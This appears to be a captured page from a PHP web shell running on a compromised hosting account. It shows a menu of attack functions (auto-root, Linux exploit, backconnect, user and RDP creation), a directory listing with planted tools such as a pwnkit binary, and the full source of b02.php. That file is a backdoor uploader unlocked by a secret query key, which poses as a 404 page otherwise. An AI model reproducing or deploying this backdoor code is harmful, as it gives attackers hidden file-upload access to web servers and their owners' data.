Linux webm007.cluster023.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.23.20.7 | : 216.73.216.126
Cant Read [ /etc/named.conf ]
5.4.45
antarbw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
antarbw /
[ HOME SHELL ]
Name
Size
Permission
Action
.ssh
[ DIR ]
drwx------
cgi-bin
[ DIR ]
drwx---r-x
requetes
[ DIR ]
drwx---r-x
www
[ DIR ]
dr-xr-xr-x
.forward
29
B
-rw----r--
.mad-root
0
B
-rw-r--r--
Dods.txt
53
B
-rw----r--
LISEZ-MOI
680
B
-rw----r--
MKD_REV.txt
27
B
-rw----r--
about.php
1.08
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
b02.php
750
B
-rw----r--
functions-helper.php
10.7
KB
-rw----r--
index.html
5.6
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
ratclouds.txt
3
B
-rw----r--
test_upload.txt
26
B
-rw----r--
thom-hardy.php
457
B
-rw----r--
tyasd.php
192.17
KB
-rw----r--
wolf.php
12.11
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : b02.php
<?php error_reporting(E_ERROR | E_PARSE); if ($_GET["key"] == "RxR"){ echo "<b>RxR HaCkEr</b><br>"; echo '<b>System Info:</b> '.php_uname(); echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Successfully!</b><br><br>'; }else { echo 'Failed!</b><br><br>'; }} }else{ $domain = $_SERVER['SERVER_NAME']; echo'<html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>';} ?>
Close